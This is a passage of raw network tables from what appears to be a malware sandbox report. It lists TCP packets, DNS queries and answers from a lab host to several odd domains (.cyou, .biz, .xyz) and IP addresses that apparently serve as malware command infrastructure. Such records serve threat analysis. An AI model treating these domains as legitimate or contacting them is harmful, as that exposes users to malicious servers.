                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.829015970 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.829061985 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.829111099 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.829149008 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.830461979 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.830513000 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.830534935 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.830580950 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.831837893 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.831901073 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.831935883 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.831975937 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.833189964 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.833245039 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.833265066 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.833282948 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.834538937 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.834610939 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.834631920 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.834678888 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.835925102 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.835973024 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.835979939 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.836066008 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.837290049 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.837347031 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.837371111 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.837413073 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.838674068 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.838726044 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.838759899 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.838804007 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.840740919 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.840801001 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.840873003 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.840917110 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.842351913 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.842403889 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.842427969 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.842470884 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.843502045 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.843547106 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.843636990 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.843689919 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.844600916 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.844655037 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.844681025 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.844723940 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.845514059 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.845561981 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.845587969 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.845628023 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.847018003 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.847068071 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.847160101 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.847203016 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.848341942 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.848392010 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.848453045 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.848501921 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.849673033 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.849734068 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.849900007 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.849951982 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.990339041 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.990428925 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.990454912 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.990504980 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.990932941 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.990999937 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.991051912 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.991149902 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.992052078 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.992125988 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.992152929 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.992248058 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.993189096 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.993345976 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.993391037 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.993391037 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.994425058 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.994482994 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.994549036 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.994693041 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.995537043 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.995577097 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.995590925 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.995642900 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.996627092 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.996676922 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.996726036 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.996813059 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.997769117 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.997874975 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.997917891 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.998296976 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.998927116 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.999000072 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.999042988 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.999042988 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:45.000061989 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:45.000144958 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:45.000168085 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:45.000252962 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:45.001218081 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:45.001296997 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:45.001308918 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:45.001359940 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:45.002371073 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:45.002420902 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:45.002458096 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:45.002458096 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:45.003532887 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:45.003619909 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:45.003664017 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:45.003664017 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:45.004679918 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:45.004718065 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:45.005835056 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:45.005841970 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:45.006278038 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:49.256057978 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:49.256114960 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:49.581794977 CET49736443192.168.2.1045.77.249.79
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:49.581856966 CET4434973645.77.249.79192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:49.581921101 CET49736443192.168.2.1045.77.249.79
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:49.582957983 CET49736443192.168.2.1045.77.249.79
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:49.582982063 CET4434973645.77.249.79192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:51.495933056 CET4434973645.77.249.79192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:51.496306896 CET49736443192.168.2.1045.77.249.79
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:51.498296022 CET49736443192.168.2.1045.77.249.79
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:51.498310089 CET4434973645.77.249.79192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:51.498657942 CET4434973645.77.249.79192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:51.555234909 CET49736443192.168.2.1045.77.249.79
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:51.555234909 CET49736443192.168.2.1045.77.249.79
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:51.555428028 CET4434973645.77.249.79192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:52.466356993 CET4434973645.77.249.79192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:52.466464996 CET4434973645.77.249.79192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:52.466550112 CET49736443192.168.2.1045.77.249.79
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:52.479820967 CET49736443192.168.2.1045.77.249.79
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:52.479872942 CET4434973645.77.249.79192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:52.479890108 CET49736443192.168.2.1045.77.249.79
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:52.479897976 CET4434973645.77.249.79192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:54.052412987 CET49748443192.168.2.10104.131.68.180
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:54.052467108 CET44349748104.131.68.180192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:54.057951927 CET49748443192.168.2.10104.131.68.180
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:54.060348988 CET49748443192.168.2.10104.131.68.180
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:54.060379982 CET44349748104.131.68.180192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:55.293925047 CET44349748104.131.68.180192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:55.294008017 CET49748443192.168.2.10104.131.68.180
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:55.296915054 CET49748443192.168.2.10104.131.68.180
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:55.296922922 CET44349748104.131.68.180192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:55.297266006 CET44349748104.131.68.180192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:55.298894882 CET49748443192.168.2.10104.131.68.180
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:55.299017906 CET49748443192.168.2.10104.131.68.180
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:55.299058914 CET44349748104.131.68.180192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:55.716460943 CET44349748104.131.68.180192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:55.716552973 CET44349748104.131.68.180192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:55.717494011 CET49748443192.168.2.10104.131.68.180
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:55.717494011 CET49748443192.168.2.10104.131.68.180
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:55.717540979 CET44349748104.131.68.180192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:55.717597008 CET49748443192.168.2.10104.131.68.180
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:55.717606068 CET44349748104.131.68.180192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:57.266853094 CET49756443192.168.2.10104.121.10.34
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:57.266901970 CET44349756104.121.10.34192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:57.267003059 CET49756443192.168.2.10104.121.10.34
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:57.268049955 CET49756443192.168.2.10104.121.10.34
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:57.268064976 CET44349756104.121.10.34192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:58.661750078 CET44349756104.121.10.34192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:58.661848068 CET49756443192.168.2.10104.121.10.34
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:58.665450096 CET49756443192.168.2.10104.121.10.34
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:58.665462017 CET44349756104.121.10.34192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:58.665801048 CET44349756104.121.10.34192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:58.675175905 CET49756443192.168.2.10104.121.10.34
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:58.715329885 CET44349756104.121.10.34192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:59.448795080 CET44349756104.121.10.34192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:59.448822021 CET44349756104.121.10.34192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:59.448842049 CET44349756104.121.10.34192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:59.449130058 CET49756443192.168.2.10104.121.10.34
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:59.449152946 CET44349756104.121.10.34192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:59.449248075 CET49756443192.168.2.10104.121.10.34
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:59.627957106 CET44349756104.121.10.34192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:59.628022909 CET44349756104.121.10.34192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:59.628057957 CET44349756104.121.10.34192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:59.628086090 CET49756443192.168.2.10104.121.10.34
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:59.628086090 CET49756443192.168.2.10104.121.10.34
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:59.628125906 CET49756443192.168.2.10104.121.10.34
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:59.628314018 CET49756443192.168.2.10104.121.10.34
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:59.628314018 CET49756443192.168.2.10104.121.10.34
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:59.628340006 CET44349756104.121.10.34192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:59.628349066 CET44349756104.121.10.34192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:44:30.087096930 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:44:30.399104118 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:44:31.008455038 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:44:32.211592913 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:44:34.621037006 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:44:39.430352926 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:44:49.039736986 CET4971580192.168.2.10176.113.115.19

                                                                                                                                                                                                                                          UDP Packets

                                                                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:40.107752085 CET5676353192.168.2.101.1.1.1
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:40.341396093 CET53567631.1.1.1192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:47.903635979 CET6374253192.168.2.101.1.1.1
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:48.123011112 CET53637421.1.1.1192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:48.126338959 CET5844653192.168.2.101.1.1.1
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:49.117774010 CET5844653192.168.2.101.1.1.1
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:49.574898958 CET53584461.1.1.1192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:49.574927092 CET53584461.1.1.1192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:52.600049973 CET6070653192.168.2.101.1.1.1
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:53.587291956 CET6070653192.168.2.101.1.1.1
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:54.051062107 CET53607061.1.1.1192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:54.051119089 CET53607061.1.1.1192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:55.722625971 CET5426253192.168.2.101.1.1.1
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:55.942847967 CET53542621.1.1.1192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:55.979276896 CET5777453192.168.2.101.1.1.1
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:56.202600002 CET53577741.1.1.1192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:56.205224037 CET5689153192.168.2.101.1.1.1
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:56.424360991 CET53568911.1.1.1192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:56.428498030 CET5596753192.168.2.101.1.1.1
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:56.657001019 CET53559671.1.1.1192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:56.659991026 CET5152553192.168.2.101.1.1.1
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:56.981900930 CET53515251.1.1.1192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:56.983802080 CET5069553192.168.2.101.1.1.1
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:57.124418020 CET53506951.1.1.1192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:57.126993895 CET5826453192.168.2.101.1.1.1
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:57.265892029 CET53582641.1.1.1192.168.2.10

                                                                                                                                                                                                                                          DNS Queries

                                                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:40.107752085 CET192.168.2.101.1.1.10x13a0Standard query (0)post-to-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:47.903635979 CET192.168.2.101.1.1.10x8eb0Standard query (0)sordid-snaked.cyouA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:48.126338959 CET192.168.2.101.1.1.10xfb30Standard query (0)immureprech.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:49.117774010 CET192.168.2.101.1.1.10xfb30Standard query (0)immureprech.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:52.600049973 CET192.168.2.101.1.1.10xe2b8Standard query (0)deafeninggeh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:53.587291956 CET192.168.2.101.1.1.10xe2b8Standard query (0)deafeninggeh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:55.722625971 CET192.168.2.101.1.1.10x2f9dStandard query (0)effecterectz.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:55.979276896 CET192.168.2.101.1.1.10x8751Standard query (0)diffuculttan.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:56.205224037 CET192.168.2.101.1.1.10xb33Standard query (0)debonairnukk.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:56.428498030 CET192.168.2.101.1.1.10x33bfStandard query (0)wrathful-jammy.cyouA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:56.659991026 CET192.168.2.101.1.1.10x950dStandard query (0)awake-weaves.cyouA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:56.983802080 CET192.168.2.101.1.1.10x565Standard query (0)sordid-snaked.cyouA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:57.126993895 CET192.168.2.101.1.1.10x9960Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                          DNS Answers

                                                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:40.341396093 CET1.1.1.1192.168.2.100x13a0No error (0)post-to-me.com104.21.56.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:40.341396093 CET1.1.1.1192.168.2.100x13a0No error (0)post-to-me.com172.67.179.207A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:48.123011112 CET1.1.1.1192.168.2.100x8eb0Name error (3)sordid-snaked.cyounonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:49.574898958 CET1.1.1.1192.168.2.100xfb30No error (0)immureprech.biz45.77.249.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:49.574898958 CET1.1.1.1192.168.2.100xfb30No error (0)immureprech.biz178.62.201.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:49.574898958 CET1.1.1.1192.168.2.100xfb30No error (0)immureprech.biz104.131.68.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:49.574927092 CET1.1.1.1192.168.2.100xfb30No error (0)immureprech.biz45.77.249.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:49.574927092 CET1.1.1.1192.168.2.100xfb30No error (0)immureprech.biz178.62.201.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:49.574927092 CET1.1.1.1192.168.2.100xfb30No error (0)immureprech.biz104.131.68.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:54.051062107 CET1.1.1.1192.168.2.100xe2b8No error (0)deafeninggeh.biz104.131.68.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:54.051062107 CET1.1.1.1192.168.2.100xe2b8No error (0)deafeninggeh.biz45.77.249.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:54.051062107 CET1.1.1.1192.168.2.100xe2b8No error (0)deafeninggeh.biz178.62.201.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:54.051119089 CET1.1.1.1192.168.2.100xe2b8No error (0)deafeninggeh.biz104.131.68.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:54.051119089 CET1.1.1.1192.168.2.100xe2b8No error (0)deafeninggeh.biz45.77.249.79A (IP address)IN (0x0001)false
